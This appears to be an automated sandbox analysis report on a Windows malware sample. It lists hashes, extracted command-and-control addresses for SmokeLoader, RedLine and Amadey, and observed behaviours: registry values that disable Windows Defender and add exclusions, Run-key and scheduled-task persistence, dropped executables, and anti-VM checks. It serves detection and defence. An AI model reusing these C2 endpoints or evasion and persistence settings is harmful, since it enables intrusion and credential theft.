Analysis
-
max time kernel
300s -
max time network
308s -
platform
windows10-1703_x64 -
resource
win10-20231020-en -
resource tags
arch:x64arch:x86image:win10-20231020-enlocale:en-usos:windows10-1703-x64system -
submitted
25/10/2023, 04:50
Static task
static1
Behavioral task
behavioral1
Sample
e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe
Resource
win10-20231020-en
General
-
Target
e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe
-
Size
1.5MB
-
MD5
62fff18212c8be20562865c69f551996
-
SHA1
676d2d5373447a1f4dc5f907fbf176f3dc611525
-
SHA256
e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae
-
SHA512
3312246a1da7c2e121f9cfb32e8aab4715753bbf0fa678ce90e5dd0ffa577c726bc7f711116b7bb124b51b2895fc637c2dedaa223f05133beca72b880af7ffb6
-
SSDEEP
24576:OyCR7wpXTSYA3ghE0+kY61B9QssEgW07/Oxt+zTy/r5ZUohwiYM7GR7ZAqTPXvjO:dCRG2YgghE0+GN8/ktEy/Yo4M7GR7ZAx
Malware Config
Extracted
smokeloader
2022
http://77.91.68.29/fks/
Extracted
redline
grome
77.91.124.86:19084
Extracted
amadey
3.89
http://77.91.124.1/theme/index.php
-
install_dir
fefffe8cea
-
install_file
explothe.exe
-
strings_key
36a96139c1118a354edf72b1080d4b2f
Extracted
redline
kinza
77.91.124.86:19084
Extracted
smokeloader
up3
Signatures
-
DcRat 15 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 3836 schtasks.exe 6756 schtasks.exe 3504 schtasks.exe 1060 schtasks.exe 6988 schtasks.exe 5564 schtasks.exe 6008 schtasks.exe 3476 schtasks.exe 3592 schtasks.exe 4536 schtasks.exe 6212 schtasks.exe 6880 schtasks.exe 3904 schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe 3596 schtasks.exe -
Glupteba payload 3 IoCs
resource yara_rule behavioral2/memory/5472-1123-0x0000000002E20000-0x000000000370B000-memory.dmp family_glupteba behavioral2/memory/5472-1125-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5472-1188-0x0000000002E20000-0x000000000370B000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 442C.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 442C.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" AppLaunch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 442C.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 442C.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 442C.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
resource yara_rule behavioral2/memory/2940-61-0x0000000000400000-0x000000000043E000-memory.dmp family_redline behavioral2/memory/5352-791-0x0000000000340000-0x000000000037E000-memory.dmp family_redline behavioral2/memory/5900-1127-0x0000000000400000-0x000000000047E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 6136 created 3320 6136 latestX.exe 48 PID 6136 created 3320 6136 latestX.exe 48 PID 6136 created 3320 6136 latestX.exe 48 PID 6136 created 3320 6136 latestX.exe 48 PID 6136 created 3320 6136 latestX.exe 48 PID 7112 created 3320 7112 updater.exe 48 PID 7112 created 3320 7112 updater.exe 48 PID 7112 created 3320 7112 updater.exe 48 PID 7112 created 3320 7112 updater.exe 48 PID 7112 created 3320 7112 updater.exe 48 PID 7112 created 3320 7112 updater.exe 48 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 244 6116 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts latestX.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 1112 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation RcYGWmr.exe Key value queried \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 53 IoCs
pid Process 3836 sq1VZ08.exe 4016 mv6FC02.exe 4940 va5Ca30.exe 4572 mP9Sj06.exe 3608 1bs92YJ6.exe 4412 2CQ7657.exe 1080 3zj66Wk.exe 3304 4ST961YO.exe 1936 5tZ8WP7.exe 196 explothe.exe 4200 6If0Yv8.exe 224 3E1D.exe 516 3EE9.exe 4644 Rl0Uz9HJ.exe 4224 vk8qw0bZ.exe 3624 TM0pC3TM.exe 1236 YD6bx5XP.exe 4172 1Dk37rF7.exe 5152 4322.exe 5204 442C.exe 5244 4612.exe 5352 2Jf821dM.exe 5832 explothe.exe 5868 EAA0.exe 5776 ED12.exe 5900 EFF1.exe 3904 forfiles.exe 5472 31839b57a4f11171d6abc8bbc4451ee4.exe 5708 setup.exe 3676 kos2.exe 6136 latestX.exe 5904 set16.exe 3236 Install.exe 1060 powershell.EXE 4552 K.exe 2392 is-U2MH6.tmp 924 Install.exe 5536 MyBurn.exe 6132 MyBurn.exe 4980 28C5.exe 5748 3028.exe 5544 31839b57a4f11171d6abc8bbc4451ee4.exe 7112 updater.exe 724 csrss.exe 7068 fydFwya.exe 7100 explothe.exe 1696 injector.exe 6660 windefender.exe 6672 RcYGWmr.exe 5392 windefender.exe 7064 explothe.exe 6236 f801950a962ddba14caaa44bf084b55c.exe 6896 explothe.exe -
Loads dropped DLL 8 IoCs
pid Process 5632 rundll32.exe 5900 EFF1.exe 5900 EFF1.exe 2392 is-U2MH6.tmp 2392 is-U2MH6.tmp 2392 is-U2MH6.tmp 5748 3028.exe 6116 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000700000001ab8c-80.dat upx behavioral2/memory/4200-82-0x0000000000400000-0x000000000041E000-memory.dmp upx behavioral2/files/0x000700000001ab8c-79.dat upx behavioral2/memory/4200-149-0x0000000000400000-0x000000000041E000-memory.dmp upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 51.159.66.125 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 442C.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" 31839b57a4f11171d6abc8bbc4451ee4.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" va5Ca30.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" TM0pC3TM.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" mP9Sj06.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" YD6bx5XP.exe Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 31839b57a4f11171d6abc8bbc4451ee4.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" sq1VZ08.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" mv6FC02.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" Rl0Uz9HJ.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" vk8qw0bZ.exe Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 3E1D.exe Set value (str) \REGISTRY\USER\S-1-5-21-459651055-4136032345-1270294931-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\ED12.exe'\"" ED12.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json RcYGWmr.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json RcYGWmr.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini RcYGWmr.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 40 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 RcYGWmr.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft RcYGWmr.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 RcYGWmr.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 RcYGWmr.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini fydFwya.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content RcYGWmr.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat RcYGWmr.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_07142A81A102242D09FF624B465962F7 RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_3177CE6CD1B3852A6EC841765B1A16FB RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_8E9F8DBF10736410A01753CD3E271280 RcYGWmr.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol fydFwya.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 RcYGWmr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 3608 set thread context of 3120 3608 1bs92YJ6.exe 75 PID 3304 set thread context of 2940 3304 4ST961YO.exe 79 PID 4172 set thread context of 5324 4172 1Dk37rF7.exe 127 PID 3904 set thread context of 1060 3904 forfiles.exe 178 PID 5748 set thread context of 68 5748 3028.exe 193 PID 4980 set thread context of 6032 4980 reg.exe 195 PID 7112 set thread context of 3948 7112 updater.exe 360 PID 7112 set thread context of 7096 7112 updater.exe 361 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 31839b57a4f11171d6abc8bbc4451ee4.exe -
Drops file in Program Files directory 28 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\MyBurn\MyBurn.exe is-U2MH6.tmp File opened for modification C:\Program Files (x86)\MyBurn\unins000.dat is-U2MH6.tmp File created C:\Program Files (x86)\KrPQunXfXpAVC\oLySDfI.xml RcYGWmr.exe File created C:\Program Files (x86)\MyBurn\unins000.dat is-U2MH6.tmp File created C:\Program Files (x86)\MyBurn\Sounds\is-I5B8T.tmp is-U2MH6.tmp File created C:\Program Files (x86)\MyBurn\is-18LTF.tmp is-U2MH6.tmp File created C:\Program Files\Google\Libs\WR64.sys updater.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak RcYGWmr.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja RcYGWmr.exe File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\WCcSaDo.dll RcYGWmr.exe File created C:\Program Files (x86)\MyBurn\is-P5G7R.tmp is-U2MH6.tmp File created C:\Program Files (x86)\MyBurn\is-NV6JO.tmp is-U2MH6.tmp File created C:\Program Files (x86)\oVhJPNkDU\ucUuRll.xml RcYGWmr.exe File created C:\Program Files (x86)\DlbZONUGhjVU2\VbPWRlrzUgMMz.dll RcYGWmr.exe File created C:\Program Files (x86)\MyBurn\Sounds\is-S5CE8.tmp is-U2MH6.tmp File created C:\Program Files\Google\Chrome\updater.exe latestX.exe File created C:\Program Files (x86)\DlbZONUGhjVU2\kvnvOro.xml RcYGWmr.exe File created C:\Program Files (x86)\MyBurn\is-LG499.tmp is-U2MH6.tmp File created C:\Program Files (x86)\MyBurn\is-L77OA.tmp is-U2MH6.tmp File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi RcYGWmr.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak RcYGWmr.exe File created C:\Program Files (x86)\KrPQunXfXpAVC\qMcUMgN.dll RcYGWmr.exe File created C:\Program Files (x86)\MyBurn\is-2DQPN.tmp is-U2MH6.tmp File created C:\Program Files (x86)\MyBurn\is-5CGJN.tmp is-U2MH6.tmp File created C:\Program Files (x86)\oVhJPNkDU\bWlzgM.dll RcYGWmr.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi RcYGWmr.exe File created C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR\PSUhcLe.xml RcYGWmr.exe File created C:\Program Files (x86)\GpfcWYRxKqUn\LphEmHi.dll RcYGWmr.exe -
Drops file in Windows directory 23 IoCs
description ioc Process File created C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job powershell.exe File created C:\Windows\Tasks\GyWbuVQzPmDmgkCMH.job schtasks.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\HKFMMLmWpeGdwIqGl.job schtasks.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune EFF1.exe File opened for modification C:\Windows\rss 31839b57a4f11171d6abc8bbc4451ee4.exe File created C:\Windows\rss\csrss.exe 31839b57a4f11171d6abc8bbc4451ee4.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri MicrosoftEdgeCP.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\ztlTbPYifermRZH.job schtasks.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6452 sc.exe 5032 sc.exe 5744 sc.exe 6112 sc.exe 2644 sc.exe 3684 sc.exe 5808 sc.exe 2452 sc.exe 5240 sc.exe 6116 sc.exe 1000 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 5412 5324 WerFault.exe 127 1136 5900 WerFault.exe 141 5520 68 WerFault.exe 193 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3zj66Wk.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3zj66Wk.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3zj66Wk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.EXE Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.EXE Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI powershell.EXE -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4536 schtasks.exe 5564 schtasks.exe 3596 schtasks.exe 6212 schtasks.exe 6880 schtasks.exe 6988 schtasks.exe 1060 schtasks.exe 3476 schtasks.exe 3904 schtasks.exe 3592 schtasks.exe 6008 schtasks.exe 3836 schtasks.exe 6756 schtasks.exe 3504 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
